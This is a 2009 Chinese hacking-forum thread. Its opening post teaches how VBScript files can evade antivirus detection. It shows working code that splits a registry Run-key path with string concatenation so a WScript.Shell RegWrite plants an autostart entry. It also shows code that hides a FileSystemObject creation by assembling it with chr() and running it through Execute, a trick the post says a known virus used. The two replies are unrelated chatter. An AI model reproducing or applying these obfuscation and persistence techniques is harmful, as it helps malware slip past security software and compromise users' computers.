找回密码
 注册
搜索
热搜: 回贴
  • 前程无忧官网首页 有什么好的平台可以
  • 最新的销售平台 互联网营销的平台有哪
  • 制作网页的基本流程 网页制作和网页设
  • 【帝国CMS】输出带序号的列表(数字排
  • 网站建设公司 三一,中联,极东泵车的
  • 织梦 建站 织梦网站模版后台怎么更改
  • 云服务官网 哪些网站有免费的简历模板
  • 如何建网站要什么条件 建网站要用什么
  • 吉林市移动公司电话 吉林省退休人员网
  • 设计类毕业论文 网站设计与实现毕业论
查看: 10293|回复: 3

VBS文件躲避杀毒软件的方法

[复制链接]
发表于 2009-11-23 02:21:00 | 显示全部楼层 |阅读模式 IP:江苏扬州
以下两个方法在网络上看到的,确实挺实用的,&号两边必须空格格开。

现在杀毒的对vbs相当敏感,只要发现对[url=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=注册表]注册表的xx作,或使用vbs运行命令(加用户) 就可能被杀。下面谈2方法可以简单解决:

1.使用连接符"&" 如:
Set CURObj = createObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函数(BY 动鲨 )

一些杀毒软件,如瑞星,他门会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵。病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,举个例子
str="set fso=createObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&""
msgbox str
Execute str
发表于 2009-12-13 06:05:09 | 显示全部楼层 IP:北京
还没崇拜过谁呢,满足一下愿望吧,谢谢!
回复

使用道具 举报

发表于 2010-2-3 22:05:13 | 显示全部楼层 IP:新西兰
有时候,不是对方不在乎你,而是你把对方看的太重。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-9-30 23:34 , Processed in 0.301244 second(s), 15 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表